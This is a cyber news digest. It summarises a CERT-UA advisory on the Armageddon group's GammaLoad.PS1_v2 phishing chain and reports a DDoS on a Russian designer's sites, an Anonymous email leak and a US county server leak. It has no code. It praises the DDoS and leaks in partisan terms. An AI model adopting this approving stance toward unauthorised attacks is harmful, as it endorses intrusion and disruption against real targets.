The 27th of July, Cyber News

Ukraine   

Cyberattacks of the UAC-0010 (Armageddon) Group Using the GammaLoad.PS1_v2 Malware

The government computer emergency response team of Ukraine CERT-UA discovered the fact of mass distribution of e-mails with the topics «Information bulletin», «Combat order», including, apparently, from the National Academy of Security of Ukraine. At the same time, e-mails are sent to private e-mail addresses of the objects of the attack.

In the attachment to the letter there is an HTM dropper, opening which will lead to the creation of a RAR archive on the computer, for example «22_07_2022.rar». The latter contains an LNK file with a name relevant to the victim, for example, «Information bulletin of the Counterintelligence Department of the Security Service of Ukraine dated July 22, 2022.lnk», and running the shortcut file will lead to the download and execution of the HTA file. The mentioned HTA file may contain VBScript code that, using PowerShell, will decode and run the GammaLoad.PS1_v2 malware. Note that attackers try to avoid DNS resolutions of domain names of management servers, for which, in order to obtain A-records (IP addresses), third-party services are used, for example: hxxps://cloudflare-dns[.]com/dns-query, hxxps://whoer[.]net/ru/checkwhois and others. Incidentally, we note the increase in the intensity of attacks using the described tactics and call for the adoption of systematic measures to reduce the attack surface (attack surface management), because, for example, the use of third-party mail services on official equipment levels the existing security perimeter (the content and attachments of e-mails are not checked by security tools).

The described activity is carried out by the group UAC-0010 (Armageddon). ^[1]

russia 

New Attack of the IT ARMY of Ukraine

The IT ARMY of Ukraine conducted a successful DDoS attack on the online resources of Artemy Lebedev, a propagandist and looter who was once mistaken for a designer. One of his «credits» is getting into the Myrotvorets site base and introducing NSDC sanctions even before the start of a full-scale invasion by the rashists. ^{[2], [3]}

World 

AnonymousAttacked Jhonlin Group

Anonymous released more than 600,000 hacked emails (513 GB) from the Jhonlin Group, an Indonesian mining and palm oil plantation conglomerate.

The conglomerate is known for using the police to intimidate journalists and activists. At least one journalist has died in prison after being arrested over complaints from the company.^[4]

In the US the Data Was «Leaked» from a Government Server

5,000 emails (2.7 GB) were leaked from a government server in Bedford County, Pennsylvania, with material dating back to February 5, 2021. The information was initially given to the Hollidaysburg Community Watchdog, which provided a copy of the Distributed Denial of Secrets to protect against censorship attempts. ^[5]